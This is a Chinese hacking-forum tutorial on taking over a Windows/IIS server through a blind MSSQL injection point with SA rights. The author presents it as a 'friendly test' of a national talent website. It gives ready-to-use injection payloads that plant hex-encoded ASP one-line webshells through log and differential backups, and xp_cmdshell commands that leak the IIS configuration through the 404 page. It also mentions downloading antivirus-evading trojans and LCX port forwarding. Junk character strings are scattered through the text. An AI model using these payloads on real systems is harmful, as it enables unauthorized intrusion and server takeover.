sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
/ o# W; J, c8 k( E% z2 |

( B/ ]7 `% f. d% ^                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
- J5 f. ?1 v* b- D% S/ e& D                                                                 
                                                                  论坛： http://www.90team.net/
1 D/ \1 k. _6 R3 |9 c& Y5 U


友情检测国家人才网


, Z9 Q- X! B$ y- q+ J$ z内容：MSSQL注入SA权限不显错模式下的入侵

$ X/ x9 Y  }% f7 f7 F# u* `
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
# }/ }3 d8 @$ k" E
% |  n- D+ H0 h+ x我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

9 o8 e* P! e1 u4 i& W- x2 k
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

3 j$ S5 X, j! _1 v9 U  M思路：

' r: y' R; W7 k首先：
! b: r( K  h0 J
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
/ \, o+ O$ `  k" i0 l( O
% h; x7 L8 \+ G4 e5 V1.日志备份获得Webshell

2.数据库差异备份获得Webshell

, |3 [1 r# W" l4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

1 M! p6 Z% H5 V0 m2 n- U

9 z% w$ L0 A" p在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
7 Z5 H& h5 O) V7 b  W. _+ M
我直接演示后面一个方法


分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

$ \+ M# T! S/ G# F8 L0 ?& j

( ]6 ?- x: A& `& A1 y$ q8 I  i  i
◆日志备份：
0 M, m* t5 ?  `3 j/ T2 T* ^( L: u
1 O( r; {: U( E1 j( L+ S
1. 进行初始备份
7 ^& h& c" v$ m/ ~* j( W; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
0 `4 ]2 O. V1 K% E$ S* N* w, u
! n8 b  H9 \6 s8 y2. 插入数据
. p9 U3 u1 D. M;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
" `# @" Y+ f! s, M( o7 u. \  p
) I: h( e" f# U0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( S' _6 [  u1 N$ ]; m' M8 H( X  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  e4 L7 Z' V! o) d$ O* O% j

5 G% z# ]. P6 W; Q* Y, _# m
◆数据库差异备份
( P+ k/ l2 p3 H3 z3 [) q, I6 T+ ~
（1. 进行差异备份准备工作

" g) E; h5 m' b# }# W0 Z: z: n;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
( Z$ c) _" q! c/ J) n
& \' d" Z- z! d" c上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码

- D" {; P% \8 t+ D4 A" [
9 z3 j5 k$ l. L* M2 v（2. 将数据写入到数据库
# P0 T: B% [) r8 ~% w( K, J;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
7 v# z! m6 ^1 i" L1 ^+ V$ o; ]8 }  }
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

2 D# F  m, m& }3 v;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

3 J& |3 ?8 O0 N: w7 x0x633A5C746573742E617370  为 c:\test.asp  删除临时文件

; z- g' D) q/ u5 K; _5 E

" j4 p6 N$ C$ y) R用^转义字符来写ASP(一句话木马)文件的方法:   
# T! ?: ^. s& a
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
5 x. @: U1 @( k4 P
; s: a0 y$ m0 O& r# m( P读取IIS配置信息获取web路径
( p" [2 D7 j) Z% ^) X" R) N! Q
  t3 T6 f5 g  D+ z; J2 u0 @     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

: C4 H3 D! t+ H5 O$ C8 `- O/ y& a执行命令
* `3 x7 u6 u; i7 B- d9 Q     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
/ `4 _5 c% z5 h
" H" B8 v9 k$ F; G: i. l
3 H0 u5 \  }8 E& k
' V" M7 W! u2 j/ _9 N9 |7 g' J. }" u
( J2 C2 [5 J, d- C


$ T8 |( R0 H* E" Y1 I8 R
% u- T8 r& Q" x/ W; C5 L, \
) M% x& R2 o2 ~$ w

7 N. G; J/ G- b1 a
( f; r2 A, p$ @+ O
! L, P) `/ `8 `



; Q/ q' }0 X" Y* f% t! n( G7 X" v



; z0 {5 Y8 `6 t7 Y( V



1 H! p. k& z! ^1 ^, t1 p1 w

0 E+ V; \' _* A  g
$ @  l, L1 u( v, C) q

$ e" P7 f) y* v# Q

9 E% K' c- W9 N" |/ o
' I2 |: \/ m& m" ?8 ~) a- F" q$ W9 v
1 z$ j/ M9 t' j0 o- K* F& B
, I) o+ e) z: k


% U- g6 z7 M, d6 P9 \% ~- E& X
7 e5 h" ~7 @  n* {
) s: C# O: ~% Y6 s' S( `

# H9 y' i7 n1 L; w
5 W: k8 A  ^0 ]* s4 D+ X6 E


7 D3 A: ]/ M  L" u) c

: d4 x5 J; r& T5 G5 F: U